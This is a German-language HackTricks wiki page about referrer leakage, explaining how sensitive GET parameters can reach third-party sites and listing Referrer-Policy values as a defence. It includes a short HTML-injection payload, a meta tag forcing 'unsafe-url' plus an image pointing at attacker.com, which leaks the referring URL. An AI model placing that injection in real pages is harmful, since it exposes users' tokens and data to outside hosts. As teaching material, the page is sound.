3.8 KiB
Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositories senden.
Referrer-Header und Richtlinie
Referrer ist der Header, den Browser verwenden, um anzuzeigen, welche vorherige Seite besucht wurde.
Ausgetretene sensible Informationen
Wenn sich an einer Stelle innerhalb einer Webseite sensible Informationen in GET-Anforderungsparametern befinden, wenn die Seite Links zu externen Quellen enthält oder ein Angreifer in der Lage ist, den Benutzer dazu zu bringen/vorzuschlagen (Social Engineering), eine URL zu besuchen, die vom Angreifer kontrolliert wird. Es könnte in der Lage sein, die sensiblen Informationen in der letzten GET-Anforderung zu exfiltrieren.
Minderung
Sie können den Browser dazu bringen, einer Referrer-Richtlinie zu folgen, die verhindern kann, dass sensible Informationen an andere Webanwendungen gesendet werden:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Gegenmaßnahme
Sie können diese Regel mit einem HTML-Meta-Tag außer Kraft setzen (der Angreifer muss eine HTML-Injektion ausnutzen):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Verteidigung
Geben Sie niemals sensible Daten in GET-Parametern oder Pfaden in der URL an.
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.